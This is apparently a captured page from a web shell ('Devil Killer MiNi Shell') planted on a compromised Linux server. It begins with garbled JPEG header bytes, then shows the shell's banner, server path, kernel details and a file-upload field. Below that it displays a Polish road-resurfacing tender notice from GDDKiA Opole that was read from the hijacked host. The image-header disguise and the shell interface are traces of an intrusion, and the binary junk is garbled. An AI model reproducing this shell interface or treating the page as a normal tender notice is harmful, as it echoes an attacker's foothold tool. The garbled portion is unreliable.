JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20210629/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20210629/0009786601-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00097866 z dnia 2021-06-29</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont nawierzchni drogi krajowej nr 45 na odcinku m. Ligota Krapkowicka – m. Żywocice od km 70+150 do km 72+650 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GENERALNA DYREKCJA DRÓG KRAJOWYCH I AUTOSTRAD ODDZIAŁ W OPOLU</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Oddział w Opolu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 017511575</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Niedziałkowskiego 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Opole</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">45-085</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 77 401 63 12</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">www.przetargi_opole@gddkia.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.gddkia.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> zarzadzanie drogami krajowymi </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont nawierzchni drogi krajowej nr 45 na odcinku m. Ligota Krapkowicka – m. Żywocice od km 70+150 do km 72+650 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c48c59a8-d4c5-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00097866</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00011850/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.16 Wymiana nawierzchni drogi krajowej nr 45 na odcinku m. Ligota Krapkowicka – m. Żywocice od km 70+150 do km 72+650.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> gddkia.eb2b.com.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">gddkia.eb2b.com.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu komunikacja między Zamawiającym a Wykonawcami, w szczególności składanie<br/>ofert oraz wszelkich oświadczeń odbywa się przy użyciu Platformy. Za datę wpływu oświadczeń,<br/>wniosków, zawiadomień oraz informacji przyjmuje się datę ich wczytania do Platformy.2) Instrukcja<br/>korzystania z Platformy : - w przypadku posiadania konta na Platformie - zgłoszenie do postępowania<br/>wymaga zalogowania Wykonawcy do Platformy ; - w przypadku, gdy Wykonawca nie posiada konta<br/>na Platformie – należy w zakładce „Postępowania”, „Lista postępowań otwartych”<br/>wybrać niniejsze postępowanie oraz korzystając z polecenia „zgłoś się do udziału w postępowaniu”<br/>przejść do Formularza rejestracyjnego . 3)Zalecenia Zamawiającego odnośnie kwalifikowanego<br/>podpisu elektronicznego: - dla dokumentów w formacie „pdf” zaleca się podpis w formatem PAdES ; -<br/>dokumenty w formacie innym niż „pdf” zaleca się podpisywać formatem XAdES .<br/>Zalecenia Zamawiającego odnośnie podpisu osobistego :- dla dokumentów w formacie „pdf” lub „xml”<br/>zaleca się podpis wewnętrzny (otoczony) ;- dokumenty w formacie innym niż „pdf” zaleca się<br/>podpisywać podpisem zewnętrznym lub otaczającym . Zalecenia Zamawiającego odnośnie podpisu<br/>zaufanego : -wielkość dokumentów nie może przekraczać 10 MB, dostępny format podpisu „xml” .4)<br/>Niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na Platformie : - stały dostęp do<br/>sieci Internet o gwarantowanej przepustowości nie mniejszej niż 2 Mb/s ; - komputer klasy PC lub MAC ,<br/>o następującej konfiguracji : pamięć min 4GB RAM, Procesor Intel IV 4GHZ , jeden z<br/>systemów operacyjnych - MS Windows 7, Mac OS x 10.4, Linux lub ich nowsze wersje ; -<br/>zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2 , w najnowszej wersji , w<br/>przypadku Internet Explorer minimalnie wersja 10.0;- włączona obsługa JavaScript ;- zainstalowany<br/>program Acrobat Reader lub inny obsługujący pliki w formacie „pdf”.5) Zamawiający dopuszcza<br/>przesyłanie danych w formatach dopuszczonych odpowiednimi przepisami prawa tj. m.in. : .doc, .docx,<br/>.txt, .xls, .xlsx, .ppt, .csv,.pdf,.jpg, .git, .png, .tif, .dwg, .ath, .kst, .zip, .rar, przy czym Zamawiający<br/>zaleca wykorzystywanie plików w formacie .pdf. Maksymalny rozmiar pojedynczego pliku to 50 MB ,<br/>przy czym nie określa się limitu liczby plików.6) Informacja na temat kodowania i czasu odbioru danych :<br/>- pliki Oferty załączone przez Wykonawcę na Platformie i zapisane, widoczne są w Platformie jako zaszyfrowane . Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez<br/>Zamawiającego po upływie terminu otwarcia ofert ; - oznaczenie czasu odbioru danych przez Platformę<br/>stanowi przypiętą do dokumentu elektronicznego datę oraz dokładny czas (hh:mm:ss) , znajdującą się<br/>po lewej stronie dokumentu w kolumnie „Data przesłania” .7) Dokumentacja przedmiotowego<br/>postępowania dostępna jest na Platformie w zakładce „Załączniki” . Pobranie dokumentu następuje po<br/>kliknięciu na wybrany załączniki wciśnięciu polecenia „Pobierz” . W celu pobrania wszystkich<br/>załączników jednocześnie należy wybrać polecenie „pobierz paczkę” , a następnie „pobierz wszystkie<br/>załączniki organizatora”.8) Ofertę ,oświadczenie , o którym mowa w pkt 10.2. IDW , zobowiązanie , o<br/>którym mowa w pkt 11.3. IDW ,dokumenty i oświadczenia należy wczytać jako załączniki na Platformie,<br/>według Instrukcji korzystania z Platformy .9) W przypadku przekazywania w postępowaniu dokumentu<br/>elektronicznego w formacie poddającym dane kompresji, opatrzenie pliku zawierającego<br/>kompresowane dokumenty kwalifikowanym podpisem elektronicznym , podpisem zaufanym lub<br/>podpisem osobistym jest równoznaczne z opatrzeniem wszystkich dokumentów zawartych w tym pliku<br/>podpisem kwalifikowanym , podpisem zaufanym lub podpisem osobistym.10) W przypadku zmiany lub<br/>wycofania Oferty, o których mowa w pkt. 16.10. IDW, Wykonawca za pośrednictwem Platformy<br/>może samodzielnie usunąć wczytaną przez siebie Ofertę .</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zamawiający informuje , że Administratorem<br/>danych osobowych Wykonawcy jest Generalny Dyrektor Dróg Krajowych i Autostrad , ul. Wronia 53 ,<br/>00-874Warszawa , tel. (022) 375 88 88 , e-mail:kancelaria@gddkia.gov.pl . 2. W sprawach związanych<br/>z przetwarzaniem danych osobowych , można kontaktować się z Inspektorem Ochrony Danych ,<br/>za pośrednictwem adresu e-mail : iod@gddkia.gov.pl . 3. Dane osobowe będą przetwarzane w<br/>celu przeprowadzenia postępowania o udzielenie zamówienia publicznego oraz w celu archiwizacji .<br/>4.Podstawę prawną przetwarzania danych osobowych stanowi ustawa Prawo zamówień publicznych<br/>,wydane na jej podstawie akty wykonawcze , a także ustawa o narodowym zasobie archiwalnym<br/>i archiwach. 5. Dane osobowe będą ujawniane wykonawcom oraz wszystkim zainteresowanym<br/>z uwzględnieniem przepisów w zakresie zamówień publicznych, a także podmiotom<br/>przetwarzającym dane na podstawie zawartych umów.6. Dane osobowe Wykonawcy będą<br/>przechowywane przez okres obowiązywania umowy a następnie 5 lat, albo 15 lat w przypadku<br/>zamówień współfinansowanych ze środków UE, począwszy od 1 stycznia roku kalendarzowego<br/>następującego po zakończeniu okresu obowiązywania umowy. Okresy te dotyczą również<br/>Wykonawców, którzy złożyli oferty i nie zostały one uznane , jako najkorzystniejsze (nie zawarto z tymi<br/>Wykonawcami umowy) .7. Osobie, której dane dotyczą przysługuje prawo: dostępu do danych. W<br/>przypadku, gdy wykonanie obowiązku związanego z prawem dostępu do danych wymagałoby<br/>niewspółmiernie dużego wysiłku , Zamawiający może żądać od osoby, której dane dotyczą, wskazania<br/>dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub<br/>daty postępowania o udzielenie zamówienia publicznego; sprostowania danych, ich usunięcia oraz<br/>ograniczenia przetwarzania na warunkach określonych w przepisach Rozporządzenia Parlamentu i<br/>Rady (UE) 2016/679 z dnia 27kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z<br/>przetwarzaniem danych osobowych iw sprawie swobodnego przepływu takich danych oraz uchylenia<br/>dyrektywy 95/46/WE. Żądanie sprostowania danych nie może skutkować zmianą wyniku postępowania<br/>o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w<br/>zakresie niezgodnym z przepisami. Żądanie sprostowania danych nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia<br/>publicznego w zakresie niezgodnym z przepisami. Wystąpienie z żądaniem ograniczenia przetwarzania<br/>, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie<br/>zamówienia publicznego; wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych. 8.<br/>Podanie danych jest dobrowolne, jednakże ich niepodanie może uniemożliwić Zamawiającemu dokonanie oceny spełniania warunków udziału w postępowaniu oraz zdolności wykonawcy do<br/>należytego wykonania zamówienia, co skutkować może wykluczeniem wykonawcy z postępowania lub<br/>odrzuceniem jego oferty.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">O.Op.D-3.2412.14.2021 (25)</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 1660972,60 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest: Remont nawierzchni jezdni drogi krajowej nr 45 na terenie<br/>Rejonu w Kędzierzynie-Koźlu (Od dnia 01.07.2021r. Rejon w Opolu) Oddziału w Opolu GDDKiA<br/>, polegająca między innymi na:- zorganizowanie i zabezpieczeniu robót, w tym oznakowanie frezowanie<br/>profilujące nawierzchni na śr. grubość 12cm wraz z oczyszczeniem podłoża wykonanie<br/>poboczy utwardzonych o grubości do 10 cm- wykonanie warstwy wyrównawczej z<br/>betonu asfaltowego AC16W na grubość do 4 cm, wraz z oczyszczaniem i skropieniem warstw<br/>konstrukcyjnych- wykonanie warstwy wiążącej z betonu asfaltowego AC 16 W, na całej<br/>szerokości jezdni, na grubość 5cm, wraz z oczyszczaniem i skropieniem warstw<br/>konstrukcyjnych- wykonanie warstwy ścieralnej grysowo-mastyksowej SMA11 o gr. 4 cm, wraz z<br/>oczyszczeniem i skropieniem warstw konstrukcyjnych- wykonanie oznakowania poziomego<br/>grubowarstwowego- przywrócenie terenu budowy do użytkowania .W ramach zamówienia,<br/>oprócz robót Wykonawca zobowiązany będzie również do :• organizacji placu budowy,•<br/>opracowania PZJ,• opracowania i zatwierdzenia projektu organizacji ruchu na czas prowadzenia<br/>robót. • wykonania i utrzymania oznakowania w trakcie prowadzenia robót oraz rozbiórki po<br/>zakończeniu robót ,• sporządzenie operatu kolaudacyjnego w 2 egzemplarzach,• zrealizowania<br/>wszelkich czynności, robót i prac koniecznych do prawidłowego, zgodnego z przepisami<br/>wykonania robót, </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233220-7 - Roboty w zakresie nawierzchni dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233142-6 - Roboty w zakresie naprawy dróg</p> <p class="mb-0">45233221-4 - Malowanie nawierzchi</p> <p class="mb-0">45233223-8 - Wymiana nawierzchni drogowej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty<br/>Zamawiający stosować będzie następujące kryteria oceny ofert: Cena (C) – 60 % ;Długość okresu<br/>gwarancji (G) - 20% ;Doświadczenie Kierownika Robót Drogowych (D) - 20 %</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji (G)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie Kierownika Robót Drogowych (D)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunki dot. sytuacji ekonomicznej lub finansowej: Wykonawca musi być ubezpieczony<br/>od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z<br/>przedmiotem zamówienia na sumę gwarancyjną co najmniej 1,5 mln PLN Warunki dot. zdolności<br/>technicznej lub zawodowej Wykonawcy :Wykonawca musi posiadać wiedzę i doświadczenie<br/>polegające na wykonaniu (zakończeniu) w okresie ostatnich 5 lat przed upływem terminu<br/>składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie co najmniej 1 zadania (co najmniej 1 umowy) polegającego na budowie, przebudowie, rozbudowie lub<br/>remoncie (z wyłączaniem remontów cząstkowych) drogi klasy co najmniej G o wartości min. 1 mln PLN. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu , o którym mowa w<br/>art.125 ust. 1 ustawy Pzp i pkt 10.2 IDW SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) dokumenty potwierdzające, że wykonawca jest ubezpieczony<br/>od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem<br/>zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia. 2) wykaz robót budowlanych<br/>wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz<br/>podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających,<br/>czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są<br/>referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane<br/>zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych<br/>dokumentów – inne odpowiednie dokumenty;</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.Wykonawca jest zobowiązany do wniesienia wadium w wysokości 16 000 PLN (słownie<br/>złotych: szesnaście tysięcy) . 2. Wadium musi być wniesione przed upływem terminu składania ofert w<br/>jednej lub kilku następujących formach wymienionych w art. 97 ust. 7 ustawy Pzp, w zależności<br/>od wyboru Wykonawcy .3. Jeżeli wadium jest wnoszone w formie gwarancji lub<br/>poręczenia Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia w<br/>postaci elektronicznej. Wadium takie musi obejmować cały okres związania ofertą. Treść<br/>gwarancji lub poręczenia nie może zawierać postanowień uzależniających jego dalsze<br/>obowiązywanie od zwrotu oryginału dokumentu gwarancyjnego do gwaranta. Jako Beneficjenta<br/>wadium wnoszonego w formie poręczeń lub gwarancji należy wskazać – „Skarb Państwa –<br/>Generalny Dyrektor Dróg Krajowych i Autostrad/Generalna Dyrekcja Dróg Krajowych i Autostrad z<br/>siedzibą przy ul. Wroniej 53, 00-874 Warszawa” . W przypadku wniesienia wadium w formie<br/>gwarancji lub poręczenia, koniecznym jest, aby gwarancja lub poręczenie obejmowały<br/>odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę,<br/>określone w art. 98 ust. 6ustawy Pzp. Gwarancja lub poręczenie musi zawierać w swojej treści<br/>nieodwołalnei bezwarunkowe zobowiązanie wystawcy dokumentu do zapłaty na rzecz<br/>Zamawiającego kwoty wadium płatne na pierwsze pisemne żądanie Zamawiającego. Gwarancja<br/>lub poręczenie musi zawierać w swojej treści wskazanie adresu e mail lub adresu pocztowego na<br/>który Zamawiający prześle oświadczenie o zwolnieniu wadium . Wadium wniesione w formie<br/>gwarancji (bankowej czy ubezpieczeniowej) musi mieć taką samą płynność jak wadium<br/>wniesione w pieniądzu –dochodzenie roszczenia z tytułu wadium wniesionego w tej formie nie<br/>może być utrudnione. Dlatego w treści gwarancji powinna znaleźć się klauzula stanowiąca, iż<br/>wszystkie spory odnośnie gwarancji będą rozstrzygane zgodnie z prawem polskim i poddane<br/>jurysdykcji sądów polskich, chyba, że wynika to z przepisów prawa.4. Wadium wniesione w<br/>pieniądzu przelewem na rachunek bankowy musi wpłynąć na rachunek bankowy Zamawiającego<br/>nr 22 113012190026 3102 9790 0001 (w tytule przelewu należy wpisać znak postępowania), najpóźniej przed upływem terminu składania ofert. Ze względu na ryzyko związane z czasem<br/>trwania okresu rozliczeń międzybankowych Zamawiający 